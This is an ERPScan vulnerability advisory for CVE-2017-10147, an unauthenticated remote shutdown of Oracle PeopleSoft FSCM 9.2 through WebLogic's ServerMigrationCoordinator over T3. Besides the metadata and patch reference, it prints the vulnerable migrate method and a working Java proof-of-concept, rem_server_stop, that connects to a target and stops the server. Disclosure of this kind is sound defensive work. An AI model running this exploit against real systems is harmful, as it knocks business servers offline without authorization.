Application: Oracle PeopleSoft **Versions Affected:**PeopleSoft FSCM 9.2 Vendor:Oracle **Bug:**Missing Authentication for Critical Function **Reported:**16.03.2017 **Vendor response:**17.03.2017 **Date of Public Advisory:**18.07.2017 **Reference: **Oracle CPU July 2017 Authors: Vahagn Vardanyan (ERPScan)
Class: Missing Authentication
Risk: High
Impact: Impact on availability
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10147
CVSS Base Score v3: 8.6 / 10
CVSS Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
---|---|
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed © |
C: Impact to Confidentiality | None (N) |
I: Impact to Integrity | None (N) |
A: Impact to Availability | High (H) |
An attacker can use a special T3 request for stopping the remote server.
PeopleSoft FSCM 9.2
To correct this vulnerability, implement Oracle CPU July 2017.
The vulnerability is presented in WebLogic/cluster/singleton/ServerMigrationCoordinator class in migrate functionality.
When we call the migrate function using T3 protocol, the PeopleSoft server will be stopped without authorization.
@Override public void migrate(final String serverName, final String sourceMachine, final String destinationMachine, final boolean sourceDown, final boolean destinationDown) throws ServerMigrationException { ServerMigrationTask task = this.taskMap.get(serverName); if (task == null) { task = new ServerMigrationTask(serverName, destinationMachine); if (MigrationDebugLogger.isDebugEnabled()) { MigrationDebugLogger.debug(serverName + " New Migration Task " + task); } this.taskMap.put(serverName, task); try { this.stopServer(sourceDown, task); this.startServer(destinationDown, task); } finally { this.taskMap.remove(serverName); } return; } throw new ServerMigrationException(“Migration operation in progress”, null); }
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
@Override
public void migrate(final String serverName, final String sourceMachine, final String destinationMachine, final boolean sourceDown, final boolean destinationDown) throws ServerMigrationException {
ServerMigrationTask task = this.taskMap.get(serverName);
if (task == null) {
task = new ServerMigrationTask(serverName, destinationMachine);
if (MigrationDebugLogger.isDebugEnabled()) {
MigrationDebugLogger.debug(serverName + " New Migration Task " + task);
}
this.taskMap.put(serverName, task);
try {
this.stopServer(sourceDown, task);
this.startServer(destinationDown, task);
}
finally {
this.taskMap.remove(serverName);
}
return;
}
throw new ServerMigrationException(“Migration operation in progress”, null);
}
—|—
static boolean rem_server_stop(String PS_SERVER_IP, Server PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException { Properties p = new Properties(); p.put(Context.INITIAL_CONTEXT_FACTORY, “weblogic.jndi.WLInitialContextFactory”); p.put(Context.PROVIDER_URL, “t3://”+PS_SERVER_IP+“:”+PS_SERVER_PORT); Context ctx = new InitialContext(p); Object obj = ctx.lookup(“weblogic/cluster/singleton/ServerMigrationCoordinator”); Object o = PortableRemoteObject.narrow(obj, ServerMigrationCoordinator.class); ServerMigrationCoordinator h = (ServerMigrationCoordinator) o; h.migrate(“PIA”,“а”,“any_data_or_ip”, true, true); return false; }
1
2
3
4
5
6
7
8
9
10
11
|
static boolean rem_server_stop(String PS_SERVER_IP, Server PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException {
Properties p = new Properties();
p.put(Context.INITIAL_CONTEXT_FACTORY, “weblogic.jndi.WLInitialContextFactory”);
p.put(Context.PROVIDER_URL, “t3://”+PS_SERVER_IP+“:”+PS_SERVER_PORT);
Context ctx = new InitialContext(p);
Object obj = ctx.lookup(“weblogic/cluster/singleton/ServerMigrationCoordinator”);
Object o = PortableRemoteObject.narrow(obj, ServerMigrationCoordinator.class);
ServerMigrationCoordinator h = (ServerMigrationCoordinator) o;
h.migrate(“PIA”,“а”,“any_data_or_ip”, true, true);
return false;
}
—|—